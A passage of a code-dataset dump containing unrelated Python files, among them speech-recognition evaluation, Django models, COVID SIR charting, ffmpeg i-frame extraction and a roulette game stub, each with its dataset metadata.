model.save(f'results/results_{window_ms}/{window_ms}scale_{ahead_ms}ahead_{class_weights[i][0]}to{class_weights[i][1]}_model_orig_vel')\n # save test set stats\n df_resutls.to_csv(f'results/results_{window_ms}/{window_ms}scale_{ahead_ms}ahead_{class_weights[i][0]}to{class_weights[i][1]}_stats_orig_vel.csv')\n # pickle model training history\n pickle.dump(history, open(f'results/results_{window_ms}/{window_ms}scale_{ahead_ms}ahead_{class_weights[i][0]}to{class_weights[i][1]}_history_orig_vel.pkl', \"wb\"))\n\ndisplay_exec_time(begin, scr_name=\"model.py\")\n # print(predictions_cal.shape, testing_cal.shape)\n\n","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":11235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"627926987","text":"from lux.interestingness.interestingness import interestingness\nfrom lux.view.ViewCollection import ViewCollection\nimport lux\n#for benchmarking\nimport time\n\ndef distribution(ldf,dataTypeConstraint=\"quantitative\"):\n\t'''\n\tGenerates bar chart distributions of different attributes in the dataset.\n\n\tParameters\n\t----------\n\tldf : lux.luxDataFrame.LuxDataFrame\n\t\tLuxDataFrame with underspecified context.\n\n\tdataTypeConstraint: str\n\t\tThe variable that controls the type of distribution chart that will be rendered.\n\n\tReturns\n\t-------\n\trecommendations : Dict[str,obj]\n\t\tobject with a collection of visualizations that result from the Distribution action.\n\t'''\n\timport scipy.stats\n\timport numpy as np\n\n\t#for benchmarking\n\tif ldf.toggleBenchmarking == True:\n\t\ttic = time.perf_counter()\n\n\tif (dataTypeConstraint==\"quantitative\"):\n\t\tquery = [lux.Spec(\"?\",dataType=\"quantitative\")]\n\t\tquery.extend(ldf.filterSpecs)\n\t\trecommendation = {\"action\":\"Distribution\",\n\t\t\t\t\t\t\t\"description\":\"Show univariate count distributions of different attributes in the dataset.\"}\n\telif (dataTypeConstraint==\"nominal\"):\n\t\tquery = [lux.Spec(\"?\",dataType=\"nominal\")]\n\t\tquery.extend(ldf.filterSpecs)\n\t\trecommendation = {\"action\":\"Category\",\n\t\t\t\t\t\t \"description\":\"Show bar chart distributions of different attributes in the dataset.\"}\n\tvc = ViewCollection(query)\n\tvc = vc.load(ldf)\t\n\tfor view in vc:\n\t\tview.score = interestingness(view,ldf)\n\tvc = vc.topK(15)\n\trecommendation[\"collection\"] = vc\n\t#for benchmarking\n\tif ldf.toggleBenchmarking == True:\n\t\ttoc = time.perf_counter()\n\t\tprint(f\"Performed distribution action in {toc - tic:0.4f} seconds\")\n\treturn recommendation","sub_path":"lux/action/Distribution.py","file_name":"Distribution.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"134728420","text":"from boilerpipe.extract import Extractor\n\n\ndef genericErrorInfo():\n import os, sys\n exc_type, exc_obj, exc_tb = sys.exc_info()\n fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n errorMessage = fname + ', ' + str(exc_tb.tb_lineno) + ', ' + str(sys.exc_info())\n print('\\tERROR:', errorMessage)\n return errorMessage\n\n\nurlList = []\nwith open(\"URLTable.txt\") as inp:\n for line in inp:\n urlList.append(line)\n\nhtmlTable = [['' for x in range(2)] for y in range(len(urlList))]\n\nfor x in range(len(urlList)):\n htmlTable[x][0], temp, htmlTable[x][1] = urlList[x].split(' ')\n\nhtmlFile = \"RawHtml.html\"\n\nfor x in range(len(htmlTable)):\n try:\n htmlID = htmlTable[x][0]\n rawHtml = open(htmlID+htmlFile, \"r\").read()\n extractor = Extractor(extractor='ArticleExtractor', html=rawHtml)\n print(extractor.getText(), file=open(htmlID+\"RawText.txt\", \"w+\"))\n print(htmlID, \" Success\")\n except:\n htmlID = htmlTable[x][0]\n print(genericErrorInfo(), file=open(htmlID+\"RawText.txt\", \"w+\"))\n print(htmlID, \" Failed\")\n genericErrorInfo()\n","sub_path":"Assignments/Assignment 3/GetRawText.py","file_name":"GetRawText.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"611141609","text":"import os\nimport torch\nimport torchaudio\nimport json\nimport numpy as np\nimport yaml\n\nfrom datasets import load_dataset, load_metric\nfrom transformers import Wav2Vec2ForCTC, Wav2Vec2Processor\nimport text_preprocess\n\nfrom ctcdecode import CTCBeamDecoder\n\n\n\"\"\"\n\nMuch of the code in this file was lifted from a HuggingFace blog entry:\n\nFine-Tune XLSR-Wav2Vec2 for low-resource ASR with Transformers\nhttps://huggingface.co/blog/fine-tune-xlsr-wav2vec2\n\nby Patrick von Platen\n\nAn implementation of a CTC (Connectionist Temporal Classification) beam search decoder with\nKenLM language models support from https://github.com/parlance/ctcdecode has been added.\n \n\"\"\"\n\n\n# Preprocessing the datasets.\n# We need to read the aduio files as arrays\ndef speech_file_to_array_fn(batch):\n batch[\"sentence\"] = text_preprocess.cleanup(batch[\"sentence\"]).strip() # + \" \"\n speech_array, sampling_rate = torchaudio.load(batch[\"path\"])\n batch[\"speech\"] = resampler(speech_array).squeeze().numpy()\n return batch\n\ndef evaluate(batch):\n inputs = processor(batch[\"speech\"], sampling_rate=16_000, return_tensors=\"pt\", padding=True)\n \n with torch.no_grad():\n logits = model(inputs.input_values.to(\"cuda\"), attention_mask=inputs.attention_mask.to(\"cuda\")).logits\n\n pred_ids = torch.argmax(logits, dim=-1)\n\n batch[\"pred_strings\"] = processor.batch_decode(pred_ids)[0].strip()\n\n beam_results, beam_scores, timesteps, out_lens = ctcdecoder.decode(logits)\n pred_with_ctc = \"\".join(vocab[n] for n in beam_results[0][0][:out_lens[0][0]])\n batch[\"pred_strings_with_ctc\"]=pred_with_ctc.strip()\n\n beam_results, beam_scores, timesteps, out_lens = ctcdecoder_withlm.decode(logits)\n pred_with_lm = \"\".join(vocab[n] for n in beam_results[0][0][:out_lens[0][0]])\n batch[\"pred_strings_with_lm\"]=pred_with_lm.strip()\n\n return batch\n\n\n#\ntest_dataset = load_dataset(\"common_voice\", \"cy\", split=\"test\")\n\nwer = load_metric(\"wer\")\n\nmodels_root_dir=\"/models\"\nwav2vec2_model_name = \"wav2vec2-xlsr-ft-cy\"\nkenlm_model_name= \"kenlm-cy\"\n\nwav2vec_model_dir = os.path.join(models_root_dir, wav2vec2_model_name)\nprocessor = Wav2Vec2Processor.from_pretrained(wav2vec_model_dir)\nmodel = Wav2Vec2ForCTC.from_pretrained(wav2vec_model_dir)\n\nmodel.to(\"cuda\")\n\nresampler = torchaudio.transforms.Resample(48_000, 16_000)\n\nvocab=processor.tokenizer.convert_ids_to_tokens(range(0, processor.tokenizer.vocab_size))\nspace_ix = vocab.index('|')\nvocab[space_ix]=' '\n\n# load alpha, betas. \nkenlm_model_dir=os.path.join(models_root_dir, kenlm_model_name)\nwith open(os.path.join(kenlm_model_dir, \"config_ctc.yaml\"), 'r') as config_file:\n ctc_lm_params=yaml.load(config_file, Loader=yaml.FullLoader)\n\nctcdecoder = CTCBeamDecoder(vocab, \n model_path='', \n alpha=0,\n beta=0,\n cutoff_top_n=40,\n cutoff_prob=1.0,\n beam_width=100,\n num_processes=4,\n blank_id=processor.tokenizer.pad_token_id,\n log_probs_input=True\n )\n\nctcdecoder_withlm = CTCBeamDecoder(vocab, \n model_path=os.path.join(kenlm_model_dir, \"lm.binary\"),\n alpha=ctc_lm_params['alpha'], # 1.3648747541523258,\n beta=ctc_lm_params['beta'], # 0.441997826890268,\n cutoff_top_n=40,\n cutoff_prob=1.0,\n beam_width=100,\n num_processes=4,\n blank_id=processor.tokenizer.pad_token_id,\n log_probs_input=True\n )\n\ntest_dataset = test_dataset.map(speech_file_to_array_fn)\n\nresult = test_dataset.map(evaluate, batch_size=8)\n\n#for r in result:\n# if r[\"pred_strings\"]!=r[\"pred_strings_with_lm\"]:\n# if (r[\"pred_strings_with_lm\"]==r[\"sentence\"]):\n# print (\"CORRECT\\n{}\\n{}\\n{}\\n\\n\".format(r[\"pred_strings_with_lm\"], r[\"pred_strings\"], r[\"sentence\"]))\n# else:\n# print (\"INCORRECT\\n{}\\n{}\\n{}\\n\\n\".format(r[\"pred_strings_with_lm\"], r[\"pred_strings\"], r[\"sentence\"]))\n\n\nprint(\"WER: {:2f}\".format(100 * wer.compute(predictions=result[\"pred_strings\"], references=result[\"sentence\"])))\nprint(\"WER with CTC: {:2f}\".format(100 * wer.compute(predictions=result[\"pred_strings_with_ctc\"], references=result[\"sentence\"])))\nprint(\"WER with CTC+LM: {:2f}\".format(100 * wer.compute(predictions=result[\"pred_strings_with_lm\"], references=result[\"sentence\"])))\n\n","sub_path":"train/python/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":4251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"616482682","text":"from django.db import models\nfrom django.contrib.auth import get_user_model\nfrom annoying.fields import AutoOneToOneField\nfrom datetime import datetime\n\n# Create your models here.\nUser = get_user_model()\n\nclass Profile(models.Model):\n user = AutoOneToOneField(User, primary_key=True, on_delete=models.CASCADE, null=False)\n joined = models.DateTimeField(auto_now_add = True)\n name = models.CharField(default = '', max_length = 30)\n GENDER = (\n (1, 'Male'),\n (2, 'Female'),\n )\n gender = models.PositiveIntegerField(choices=GENDER, default = 1)\n age = models.PositiveIntegerField(default = 20)\n school = models.CharField(default = 'Seoul National University', max_length = 50)\n major = models.CharField(default = '', max_length = 30)\n description = models.TextField(default = '')\n contact = models.TextField(default = '010-0000-0000')\n\nclass Restaurant(models.Model):\n name = models.CharField(max_length=30)\n description = models.CharField(max_length=50)\n menu = models.TextField(default = '')\n location = models.TextField(default = '')\n hours = models.TextField(default = '')\n\nclass Matching(models.Model):\n owner = models.ForeignKey(Profile, related_name='matchings', on_delete=models.CASCADE, null=False)\n restaurant = models.ForeignKey(Restaurant, on_delete=models.CASCADE, null=False)\n since = models.DateTimeField(default = datetime.now)\n till = models.DateTimeField(default = datetime.now)\n minage = models.PositiveIntegerField(default = 20)\n maxage = models.PositiveIntegerField(default = 30)\n GENDER = (\n (1, 'Male'),\n (2, 'Female'),\n (3, 'Any')\n )\n gender = models.PositiveIntegerField(choices=GENDER, default = 3)\n matchingMessage = models.TextField(default = '')\n keyword = models.TextField(default = '')\n maxNumber = models.PositiveIntegerField(default = 2)\n STATUS = (\n (1, '모집중'),\n (2, '모집 완료'),\n (3, '만남 완료')\n )\n status = models.PositiveIntegerField(choices=STATUS, default=1)\n\nclass MatchingRequest(models.Model):\n user = models.ForeignKey(Profile, related_name='requests', on_delete=models.CASCADE, null=False)\n matching = models.ForeignKey(Matching, related_name='requests', on_delete=models.CASCADE, null=False)\n requestMessage = models.TextField(default = '')\n STATUS = (\n (1, '수락 대기중'),\n (2, '수락됨'),\n )\n status = models.PositiveIntegerField(choices=STATUS, default=1)\n\nclass Notification(models.Model):\n user = models.ForeignKey(Profile, related_name='notifications', on_delete=models.CASCADE, null=False)\n matching = models.ForeignKey(Matching, on_delete=models.SET_NULL, null=True)\n message = models.TextField(default = '')\n ifCheck = models.BooleanField(default = False)\n\nclass MatchingReview(models.Model):\n user = models.ForeignKey(Profile, related_name='reviews', on_delete=models.CASCADE, null=False)\n matching = models.ForeignKey(Matching, on_delete=models.CASCADE, null=True)\n score = models.PositiveSmallIntegerField(default = 3) # 1 ~ 5\n title = models.CharField(default = '', max_length = 30)\n detail = models.TextField(default = '')\n","sub_path":"bobtogether/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"283530892","text":"import numpy\nfrom _fmm2d_py_gpu import fmm2d_py\n\ndef fmm_velocity(xBlob,yBlob,wBlob,sigma,k=2.0,xTarget=None,yTarget=None,Ndirect=35,tol=1.0e-6,cutoff=None):\n\n # convert blob parameters into the parameters of the fmm solver\n alpha = 1.2564312086261696770\n \n ksigmasqr = k*sigma*sigma\n xopt = numpy.sqrt(alpha*ksigmasqr)\n if cutoff==None: cutoff = 5.0*xopt\n\n if xTarget==None:\n xTarget = xBlob.copy()\n yTarget = yBlob.copy()\n\n \n vy_fmm_cpu,vx_fmm_cpu = fmm2d_py(xBlob,yBlob,wBlob,xTarget,yTarget,Ndirect,xopt,cutoff,tol)\n \n return -vx_fmm_cpu/(2.0*numpy.pi),-vy_fmm_cpu/(2.0*numpy.pi)\n","sub_path":"src/cpp/blobs/c++/fmm2d_py_cpu_gpu/fmm_velocity.py","file_name":"fmm_velocity.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"230286048","text":"\"\"\"\nWilliam Austin\nPrakash Dhimal\nGeorge Mason University\nCS 584 Theory and Applications of Data Mining\nSemester project: Predicting the Impact of COVID-19\n\"\"\"\nfrom datetime import datetime, timedelta\n\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as mticker\nimport matplotlib.ticker as plticker\nimport numpy as np\n\nimport Common as common\nimport Utilities as util\n\n\ndef getFullTickLabel(dayIndex):\n dayIndexInt = int(dayIndex)\n start = datetime(2020, 1, 22)\n offset = timedelta(days=dayIndex)\n tickDate = start + offset\n return tickDate.strftime(\"%b %d\") + \" (\" + str(dayIndexInt) + \")\"\n\n\ndef updateTicks(x, pos):\n return getFullTickLabel(x)\n\n\ndef createHistoricalBetaChart(historicalRange, fullData, countryName):\n betaSmoothed15 = util.getGaussianAverage(fullData[\"beta\"], 1.5)\n betaSmoothed4 = util.getGaussianAverage(fullData[\"beta\"], 4)\n \n figure1, axis1 = plt.subplots()\n figure1.set_size_inches(7.5, 7.5)\n figure1.subplots_adjust(bottom=0.16)\n axis1.plot(historicalRange, fullData[\"beta\"], label=\"Observed Beta\", color=\"gray\")\n # plt.plot(betaSmoothed3)\n # plt.plot(betaSmoothed7)\n axis1.plot(historicalRange, betaSmoothed15, label=\"Smoothed Beta, Sigma = 1.5\", color=\"blue\")\n axis1.plot(historicalRange, fullData[\"betaSmoothed\"], label=\"Smoothed Beta, Sigma = 2.5\", color=\"deepskyblue\")\n axis1.plot(historicalRange, betaSmoothed4, label=\"Smoothed Beta, Sigma = 4\", color=\"limegreen\")\n # plt.plot(gaussianSmoothed2)\n axis1.set_xlabel(\"Day Number\")\n axis1.set_ylabel(\"Transmission Rate\")\n # axis1.xticks(np.arange(0, tsSize, 10))\n axis1.xaxis.set_major_locator(plticker.MultipleLocator(base=10))\n axis1.xaxis.set_tick_params(rotation=60)\n axis1.xaxis.set_major_formatter(mticker.FuncFormatter(updateTicks))\n axis1.legend()\n axis1.set_title(\"Historical Transmission Rate for \" + countryName, fontsize=\"xx-large\")\n # figure1.suptitle(\"Historical Transmission Rate for \" + countryName)\n\n\ndef createPredictionChart(tsSize, futurePredictionDays, historicalRange, predictionRange, fullData, futurePredictions,\n countryName):\n figure2, axis2 = plt.subplots()\n figure2.set_size_inches(7.5, 7.5)\n\n axis2.axvspan(tsSize - 1, tsSize + futurePredictionDays - 2, alpha=0.3, color='gray')\n # plt.plot(historicalRange, S)\n axis2.plot(historicalRange, fullData[\"I\"], label=\"Infected (Confirmed Cases)\", color=\"black\", linestyle='solid')\n axis2.plot(historicalRange, fullData[\"R\"], label=\"Recovered (Deaths + Recovered Cases)\", color=\"black\",\n linestyle='dotted')\n\n # plt.plot(predictionRange, SP1)\n axis2.plot(predictionRange, futurePredictions[\"sirConstant\"][1], label=\"Infected Prediction (constant beta)\",\n color=\"red\", linestyle='solid')\n axis2.plot(predictionRange, futurePredictions[\"sirConstant\"][2], label=\"Recovered Prediction (constant beta)\",\n color=\"red\", linestyle='dotted')\n\n axis2.plot(predictionRange, futurePredictions[\"sirDownward\"][1], label=\"Infected Prediction (decreasing beta)\",\n color=\"green\", linestyle='solid')\n axis2.plot(predictionRange, futurePredictions[\"sirDownward\"][2], label=\"Recovered Prediction (decreasing beta)\",\n color=\"green\", linestyle='dotted')\n\n axis2.plot(predictionRange, futurePredictions[\"sirContinueTrend\"][1],\n label=\"Infected Prediction (continue beta trend)\", color=\"blue\", linestyle='solid')\n axis2.plot(predictionRange, futurePredictions[\"sirContinueTrend\"][2],\n label=\"Recovered Prediction (continue beta trend)\", color=\"blue\", linestyle='dotted')\n\n axis2.set_xlabel(\"Day Number\")\n axis2.set_ylabel(\"Number of Individuals\")\n # axis2.xticks(np.arange(0, tsSize + predictionDays, 10))\n axis2.xaxis.set_major_locator(plticker.MultipleLocator(base=10))\n axis2.xaxis.set_tick_params(rotation=60)\n axis2.xaxis.set_major_formatter(mticker.FuncFormatter(updateTicks))\n axis2.legend()\n axis2.set_title(\"60 Day Predictions for \" + countryName + \" (Infected and Recovered)\", fontsize=\"xx-large\")\n # figure2.suptitle(\"60 Day Predictions for \" + countryName + \" (Infected and Recovered)\")\n\n\ndef createPredictionsBetaChart(predictionRange, futurePredictions, countryName):\n figure3, axis3 = plt.subplots()\n figure3.set_size_inches(7.5, 7.5)\n axis3.plot(predictionRange, futurePredictions[\"betaConstant\"], label=\"Constant beta\", color=\"red\")\n axis3.plot(predictionRange, futurePredictions[\"betaDownward\"], label=\"Decreasing beta\", color=\"green\")\n axis3.plot(predictionRange, futurePredictions[\"betaContinueTrend\"], label=\"Continue beta trend\", color=\"blue\")\n axis3.set_xlabel(\"Day Number\")\n axis3.set_ylabel(\"Transmission Rate\")\n # axis3.xticks(np.arange(tsSize - 1, tsSize + predictionDays, 5))\n axis3.xaxis.set_major_locator(plticker.MultipleLocator(base=5))\n axis3.xaxis.set_tick_params(rotation=60)\n axis3.xaxis.set_major_formatter(mticker.FuncFormatter(updateTicks))\n axis3.legend()\n axis3.set_title(\"Prediction Beta Values for \" + countryName, fontsize=\"xx-large\")\n # figure3.suptitle(\"Prediction Beta Values for \" + countryName)\n\n\ndef createValidationChart(tsSize, fullData, cvPredictionDays, cvFullRange, cvTestRange, cvPredictions, countryName):\n figure4, axis4 = plt.subplots()\n figure4.set_size_inches(7.5, 7.5)\n # figure4.canvas.draw()\n\n axis4.axvspan(tsSize - cvPredictionDays - 1, tsSize, alpha=0.3, color='silver')\n # plt.plot(historicalRange, S)\n axis4.plot(cvFullRange, fullData[\"I\"], label=\"Infected (Confirmed Cases)\", color=\"black\", linestyle='solid',\n linewidth=3.5)\n axis4.plot(cvFullRange, fullData[\"R\"], label=\"Recovered (Deaths + Recovered Cases)\", color=\"black\",\n linestyle='dotted', linewidth=3.5)\n\n # plt.plot(predictionRange, SP1)\n axis4.plot(cvTestRange, cvPredictions[\"sirConstant\"][1], label=\"Infected Prediction (constant beta)\", color=\"red\",\n linestyle='solid')\n axis4.plot(cvTestRange, cvPredictions[\"sirConstant\"][2], label=\"Recovered Prediction (constant beta)\", color=\"red\",\n linestyle='dotted')\n\n axis4.plot(cvTestRange, cvPredictions[\"sirDownward\"][1], label=\"Infected Prediction (decreasing beta)\",\n color=\"green\", linestyle='solid')\n axis4.plot(cvTestRange, cvPredictions[\"sirDownward\"][2], label=\"Recovered Prediction (decreasing beta)\",\n color=\"green\", linestyle='dotted')\n\n axis4.plot(cvTestRange, cvPredictions[\"sirContinueTrend\"][1], label=\"Infected Prediction (continue beta trend)\",\n color=\"blue\", linestyle='solid')\n axis4.plot(cvTestRange, cvPredictions[\"sirContinueTrend\"][2], label=\"Recovered Prediction (continue beta trend)\",\n color=\"blue\", linestyle='dotted')\n\n axis4.set_xlabel(\"Day Number\")\n axis4.set_ylabel(\"Number of Individuals\")\n # axis2.xticks(np.arange(0, tsSize + predictionDays, 10))\n axis4.xaxis.set_major_locator(plticker.MultipleLocator(base=10))\n axis4.xaxis.set_tick_params(rotation=60)\n axis4.xaxis.set_major_formatter(mticker.FuncFormatter(updateTicks))\n # axis4.xaxis.\n # print(\"Tick Labels = \" + str(axis4.get_xticklabels()))\n\n # axis_labels = [getFullTickLabel(int(q)) for q in axis4.get_xticks().tolist()]\n # print(axis_labels)\n # axis4.set_xlabels(axis_labels)\n # axis4.xticks(rotation=60)\n # $[getFullTickLabel(str(i)) for i in range(0, tsSize, 10)]\n # axis_labels = [item.get_text() for item in axis4.get_xticklabels()]\n # axis4.set_xticklabels(axis_labels)\n\n axis4.legend()\n axis4.set_title(\"Compare 30 Day Predictions vs. Actual for \" + countryName + \" (Infected and Recovered)\",\n fontsize=\"xx-large\")\n # figure2.suptitle(\"60 Day Predictions for \" + countryName + \" (Infected and Recovered)\")\n\n\ndef analyzeCountrySIR(tsData, countryName, chartSet, callShowPlot=True):\n tsSize = tsData.dateCount\n countryData = tsData.countryMap[countryName]\n countryPopulation = countryData.population\n futurePredictionDays = 60 # Arrays will be 31\n cvPredictionDays = 30\n\n fullData = util.getObservedModelValues(tsData, countryName)\n\n historicalRange = np.arange(tsSize)\n predictionRange = np.arange(tsSize - 1, tsSize + futurePredictionDays)\n\n futurePredictions = util.getStandardPredictions(tsData, countryName, 0, tsSize - 1, futurePredictionDays)\n cvPredictions = util.getStandardPredictions(tsData, countryName, 0, tsSize - cvPredictionDays - 1, cvPredictionDays)\n cvTrainRange = np.arange(0, tsSize - cvPredictionDays)\n cvTestRange = np.arange(tsSize - cvPredictionDays - 1, tsSize)\n cvFullRange = np.arange(0, tsSize)\n\n if \"HistoricalBetaChart\" in chartSet:\n createHistoricalBetaChart(historicalRange, fullData, countryName)\n\n if \"PredictionChart\" in chartSet:\n createPredictionChart(tsSize, futurePredictionDays, historicalRange, predictionRange, fullData,\n futurePredictions, countryName)\n\n if \"PredictionsBetaChart\" in chartSet:\n createPredictionsBetaChart(predictionRange, futurePredictions, countryName)\n\n if \"ValidationChart\" in chartSet:\n createValidationChart(tsSize, fullData, cvPredictionDays, cvFullRange, cvTestRange, cvPredictions, countryName)\n\n if callShowPlot:\n plt.tight_layout()\n plt.show()\n\n\nif __name__ == '__main__':\n tsData = common.getTimeSeriesData()\n\n # for i in range(tsData.countryCount):\n # countryName = tsData.countryIndex[i]\n # countryData = tsData.countryMap[countryName]\n # print(\"Country is: \" + countryName + \", and first case was: \" + str(tsData.dateIndex[countryData.firstIndex]))\n\n allCharts = {\"HistoricalBetaChart\", \"PredictionChart\", \"PredictionsBetaChart\", \"ValidationChart\"}\n\n # for c in [\"US\", \"Canada\", \"China\", \"Germany\", \"France\", \"Italy\", \"Brazil\", \"Russia\", \"Nigeria\", \"Mexico\"]:\n # analyzeCountrySIR(tsData, c, {\"HistoricalBetaChart\"}, False)\n\n #plt.show()\n\n analyzeCountrySIR(tsData, \"US\", allCharts, True)\n\n print(\"Done\")\n","sub_path":"src/AnalyzeTransmissionRates.py","file_name":"AnalyzeTransmissionRates.py","file_ext":"py","file_size_in_byte":10103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"376429719","text":"from django.db import models\nfrom django_fsm_ex import ConcurrentTransitionMixin, transition, FSMField, ConcurrentTransition\n\nimport pytest\npytestmark = pytest.mark.django_db\n\nclass LockedBlogPost(ConcurrentTransitionMixin, models.Model):\n state = FSMField(default='new', protected=True)\n text = models.CharField(max_length=50)\n\n @transition(field=state, source='new', target='published')\n def publish(self):\n pass\n\n @transition(field=state, source='published', target='removed')\n def remove(self):\n pass\n\n class Meta:\n app_label = 'testapp'\n\n\nclass ExtendedBlogPost(LockedBlogPost):\n review_state = FSMField(default='waiting', protected=True)\n notes = models.CharField(max_length=50)\n\n @transition(field=review_state, source='waiting', target='rejected')\n def reject(self):\n pass\n\n class Meta:\n app_label = 'testapp'\n\n\ndef test_create_succeed():\n LockedBlogPost.objects.create(text='test_create_succeed')\n\ndef test_crud_succeed():\n post = LockedBlogPost(text='test_crud_succeed')\n post.publish()\n post.save()\n\n post = LockedBlogPost.objects.get(pk=post.pk)\n assert ('published' == post.state)\n post.text = 'test_crud_succeed2'\n post.save()\n\n post = LockedBlogPost.objects.get(pk=post.pk)\n assert ('test_crud_succeed2' == post.text)\n\ndef test_save_and_change_succeed():\n post = LockedBlogPost(text='test_crud_succeed')\n post.publish()\n post.save()\n\n post.remove()\n post.save()\n\ndef test_concurent_modifications_raise_exception():\n post1 = LockedBlogPost.objects.create()\n post2 = LockedBlogPost.objects.get(pk=post1.pk)\n\n post1.publish()\n post1.save()\n\n post2.text = 'aaa'\n post2.publish()\n with pytest.raises(ConcurrentTransition):\n post2.save()\n\ndef test_inheritance_crud_succeed():\n post = ExtendedBlogPost(text='test_inheritance_crud_succeed', notes='reject me')\n post.publish()\n post.save()\n\n post = ExtendedBlogPost.objects.get(pk=post.pk)\n assert ('published' == post.state)\n post.text = 'test_inheritance_crud_succeed2'\n post.reject()\n post.save()\n\n post = ExtendedBlogPost.objects.get(pk=post.pk)\n assert ('rejected' == post.review_state)\n assert ('test_inheritance_crud_succeed2' == post.text)\n","sub_path":"tests/testapp/tests/test_lock_mixin.py","file_name":"test_lock_mixin.py","file_ext":"py","file_size_in_byte":2281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"481710506","text":"from threading import *\nfrom time import *\n\nclass Producer:\n def __init__(self):\n self.products =[]\n self.ordersplaced = False\n\n def produce(self):\n\n for i in range(1, 5):\n self.products.append(\"Product_\" + str(i))\n sleep(1)\n print(\"Product added\")\n\n self.ordersplaced = True\n print(\"Orders placed\")\n\nclass Consumer:\n def __init__(self, prod):\n self.prod = prod\n\n def consume(self):\n while self.prod.ordersplaced == False:\n print(\"Waiting for the orders\")\n sleep(0.4)\n\n print(\"Orders shipping \", self.prod.products)\n\np = Producer()\nc = Consumer(p)\n\n#Consumer thread\nct = Thread(target=c.consume)\nct.start()\n\n#Producer thread\npt = Thread(target=p.produce)\npt.start()","sub_path":"Python/Udemy_PythonCoreAdvanced/multithreading/threadcommunicationusingflag.py","file_name":"threadcommunicationusingflag.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"609154528","text":"'''\niframe_extract.py - download video and ffmpeg i-frame extraction\nUsage: \n(ex) python iframe_extract.py -u https://www.youtube.com/watch?v=dP15zlyra3c\nThis code does two things:\n1. Download using youtube-dl\n2. Extract i-frames via ffmpeg\n'''\n\nfrom __future__ import unicode_literals\nfrom moviepy.video.io.VideoFileClip import VideoFileClip\nimport sys\nimport os\nimport subprocess\nimport argparse\n\n# -s : size\n\ndef iframe_extract(inFile,outFolder):\n\n# extract i-frame using ffmpeg\n# ffmpeg -i inFile -f image2 -vf \\\n# \"select='eq(pict_type,PICT_TYPE_I)'\" -vsync vfr oString%03d.png\n\n # infile : video file name \n # (ex) 'FoxSnowDive-Yellowstone-BBCTwo.mp4'\n\n #create folder per each file\n with open('frame_log.log','a+') as f:\n inFile = '\"' + inFile.replace('/', '\"/\"') + '\"'\n tempIn = inFile.split('/')[-1]\n outFolder = outFolder + '/' + tempIn\n \n f.write(\"outFolder : \" + outFolder + \"\\n\")\n f.write(\"inFile : \" + inFile + \"\\n\\n\")\n\n if not os.path.exists(outFolder):\n os.mkdir(outFolder)\n \n # start extracting i-frames\n inFile = inFile.replace('\"','')\n clip = VideoFileClip(inFile)\n movie_length = int(clip.duration)\n\n if int(movie_length * 0.05) >= 300:\n start = 300\n end = movie_length-300\n else:\n start = int(movie_length * 0.05)\n end = movie_length - (movie_length * 0.05) \n\n try:\n if os.path.isfile(inFile):\n imgFilenames = outFolder + '/%05d.png'\n cmd = [\"ffmpeg\",'-i', inFile,'-f', 'image2','-vf',\n \"select='eq(pict_type,PICT_TYPE_I)'\",'-vsync','vfr',\n '-ss', str(start), '-t', str(end), imgFilenames]\n # create iframes\n subprocess.call(cmd)\n \n elif os.path.isdir(inFile):\n for file in os.listdir(inFile):\n eachFolder = file.replace(\" \",\"\")\n eachFolder = eachFolder.replace(\"'\",\"\")\n\n try:\n if not os.path.exists(outFolder + \"/'\" + eachFolder + \"'\"):\n os.system(\"mkdir \"+ outFolder + \"/'\" + eachFolder + \"'\")\n except:\n pass\n\n imgFilenames = outFolder + \"/\" + eachFolder + \"/%05d.png\"\n\n cmd = [\"ffmpeg\",'-i', os.path.join(inFile,file), '-f', 'image2','-vf',\n \"select='eq(pict_type,PICT_TYPE_I)'\",'-vsync','vfr',\n '-ss', str(start), '-t', str(end), imgFilenames]\n\n # create iframes\n subprocess.call(cmd)\n else:\n print(inFile)\n except Exception as e:\n print(e)\n\n\ndef check_arg(args=None):\n\n# Command line options\n# If a path contains blank, you should add ''\n\n parser = argparse.ArgumentParser(description='extract iframe from downloaded video')\n '''\n parser.add_argument('-u', '--url',\n help='download url',\n )\n '''\n parser.add_argument('-o', '--outfolder',\n help='output folder name for iframe images')\n parser.add_argument('-i', '--infile',\n help='input to iframe extract')\n\n results = parser.parse_args(args)\n return (results.infile, results.outfolder)\n\n'''\nUsage sample:\n syntax: python iframe_extract.py -i path -o path\n'''\n\nif __name__ == '__main__':\n i,o = check_arg(sys.argv[1:])\n #changed_frame_extract(i)\n iframe_extract(i,o)\n","sub_path":"iframe_extraction.py","file_name":"iframe_extraction.py","file_ext":"py","file_size_in_byte":3453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"184402664","text":"#Precondition: You have a certain amount of bets you can place with a certain amount of money\n#Postcondition: The amount of money you win is displayed on the screen with all of your winnings\n#Purpose: To bet as much money as you have and win as much as possible \n\n\n\n\n#import your functions needed\nfrom random import *\nfrom math import *\n\n\n#function1: get_number_to_bet_on() \n#purpose: Asking user for the number they want to bet on\n#preconditions: None \n#postconditions: returns integer\n#Call the function\ndef get_a_number_to_bet_on():\n #1. ask the user to enter a bet from 0-36\n betnum = input(\"What number do you want to bet on? (0-36) \")\n 